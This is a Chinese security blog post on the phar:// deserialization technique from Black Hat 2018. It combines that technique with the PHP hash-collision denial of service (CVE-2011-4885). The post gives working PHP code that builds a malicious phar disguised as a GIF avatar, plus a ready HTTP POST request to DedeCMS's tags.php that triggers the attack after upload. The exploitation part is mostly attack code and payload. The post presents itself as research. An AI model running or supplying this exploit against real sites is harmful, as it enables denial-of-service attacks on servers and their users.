blackhat议题深入 | phar反序列化

本文来自 ChaMd5安全团队审计组 呆哥,文章内容以思路为主。

如需转载,请先联系ChaMd5安全团队授权。

未经授权请勿转载。

引言

在Blackhat2018,来自Secarma的安全研究员Sam Thomas讲述了一种攻击PHP应用的新方式,利用这种方法可以在不使用unserialize()函数的情况下触发PHP反序列化漏洞。

漏洞原理

漏洞触发点在使用phar://协议读取文件的时候,文件内容会被解析成phar对象,然后phar对象内的Metadata信息会被反序列化。其实这个漏洞点并不是第一次出现,早在hitcon2017就被Orange大佬用来出CTF题了(见baby^h-master-php-2017)。

从PHP官方手册中我们可以看到Meta-data是用serialize()生成并保存在phar文件中的:

跟进PHP内核可以看到,当内核调用phar_parse_metadata()解析metadata数据时,会调用php_var_unserialize()对其进行反序列化操作,因此会造成反序列化漏洞。

漏洞利用

在Sam Thomas的举出的例子中可以看到,该漏洞主要通过利用魔术方法__destruct或__wakeup构造利用链,但是在实战环境里往往较难找到可以直接通过魔术方法触发的漏洞点。

由于通过反序列化可以产生任意一种数据类型,因此我想到了PHP的一个很古老的漏洞:PHP内核哈希表碰撞攻击(CVE-2011-4885)。在PHP内核中,数组是以哈希表的方式实现的,攻击者可以通过巧妙的构造数组元素的key使哈希表退化成单链表(时间复杂度从O(1) => O(n))来触发拒绝服务攻击。

PHP修复此漏洞的方式是限制通过$_GET或$_POST等方式传入的参数数量,但是如果PHP脚本通过json_decode()或unserialize()等方式获取参数,依然将受到此漏洞的威胁。

接下来的漏洞利用思路就很明显了:构造一串恶意的serialize数据(能够触发哈希表拒绝服务攻击),然后将其保存到phar文件的metadata数据区,当文件操作函数通过phar://协议对其进行操作的时候就会触发拒绝服务攻击漏洞!

我们可以通过如下代码生成一个恶意的phar文件:

<?php
set_time_limit(0);
$size= pow(2, 16);
$array = array();
for ($key = 0, $maxKey = ($size - 1) * $size; $key <= $maxKey; $key += $size) {
    $array[$key] = 0;
}
$new_obj = new stdClass;
$new_obj->hacker = $array;
$p = new Phar(__DIR__ . '/avatar.phar', 0);
$p['hacker.php'] = '<?php ?>';
$p->setMetadata($new_obj);
$p->setStub('GIF<?php __HALT_COMPILER();?>');

然后通过如下代码测试拒绝服务攻击效果:

<?php
set_time_limit(0);
$startTime = microtime(true);
file_exists("phar://avatar.phar");
$endTime = microtime(true);
echo '执行时间:  '.($endTime - $startTime). ' 秒'; 

在我的机器上的测试效果:

漏洞实例复现

这里我要利用DedeCMS一个很出名的漏洞点,这个漏洞最初被用于探测后台目录,之后在“巅峰极客”比赛中被当做SSRF攻击利用,现在我要利用这个漏洞点构造phar反序列化来产生拒绝服务攻击!

首先通过织梦的头像上传点来上传phar文件(avatar.jpg)

文件位置: /member/edit_face.php

由于DedeCMS默认的上传文件大小被限制为50K,所以我们要修改一下配置文件:

找到\data\config.cache.inc.php,

把$cfg_max_face修改为5000

上传成功后就会显示出文件的相对路径,然后直接构造如下数据包即可验证漏洞:

POST /uploads/tags.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencode
Content-Length: 136    

dopost=save&_FILES[lsa][tmp_name]=phar://uploads/userup/3/myface.jpg&_FILES[lsa][name]=0&_FILES[lsa][size]=0&_FILES[lsa][type]=image/gif

参考

[1]https://www.lorexxar.cn/2017/11/10/hitcon2017-writeup/

[2]http://php.net/manual/en/book.phar.php

[3]https://blog.ripstech.com/2018/new-php-exploitation-technique/

[4]http://www.laruence.com/2011/12/30/2435.html

[5]https://raw.githubusercontent.com/s-n-t/presentations/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf

原文发布于微信公众号 - ChaMd5安全团队(chamd5sec)

原文发表时间:2018-08-22

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏FreeBuf

PTFuzzer:一个基于硬件加速的二进制程序Fuzz工具

PTFuzzer是基于AFL框架实现的一款开源fuzz工具,它采用了Intel Processor Trace硬件部件来收集程序执行的路径信息,改进了原来AFL...

22130
来自专栏漫漫全栈路

Python爬虫学习之旅-从基础开始

知其然,知其所以然。使用爬虫,必须要先理解爬虫的原理,先说下爬虫的基本流程和基本策略。

337100
来自专栏大数据杂谈

用Python爬虫获取自己感兴趣的博客文章

20290
来自专栏数据科学学习手札

(数据科学学习手札47)基于Python的网络数据采集实战(2)

  马上大四了,最近在暑期实习,在数据挖掘的主业之外,也帮助同事做了很多网络数据采集的内容,接下来的数篇文章就将一一罗列出来,来续写几个月前开的这个网络数据采集...

15040
来自专栏linux驱动个人学习

tty各种设备的情况

通常使用tty来简称各种类型的终端设备。 (1)串口端口终端(/dev/ttySn)   串行端口终端(Serial Port Terminal)是使用计算机串...

408100
来自专栏架构师之路

如何实现超高并发的无锁缓存?

一、需求缘起 【业务场景】 有一类写多读少的业务场景:大部分请求是对数据进行修改,少部分请求对数据进行读取。 例子1:滴滴打车,某个司机地理位置信息的变化(可能...

63270
来自专栏Ryan Miao

做项目中没经验遇到的各种问题

1.java基础不牢,关于对象和类的生命周期等不明白 在做app登陆token验证的时候。我设计一个tokenutil中添加一个成员变量map,每次登陆成功,将...

30480
来自专栏游戏杂谈

nginx的配置笔记

nginx中每一个host都会被包含在一个server{}中,在编写nginx规则时,它支持一些基本的正则。

12630
来自专栏java一日一条

常用的 Python 爬虫技巧总结

用python也差不多一年多了,python应用最多的场景还是web快速开发、爬虫、自动化运维:写过简单网站、写过自动发帖脚本、写过收发邮件脚本、写过简单验证码...

12950
来自专栏Golang语言社区

Go 语言编写的缓存及缓存过滤库:groupcache

groupcache 是使用 Go 语言编写的缓存及缓存过滤库,作为 memcached 许多场景下的替代版本。 对比原始 memcached ? 首先,gr...

26940

扫码关注云+社区

领取腾讯云代金券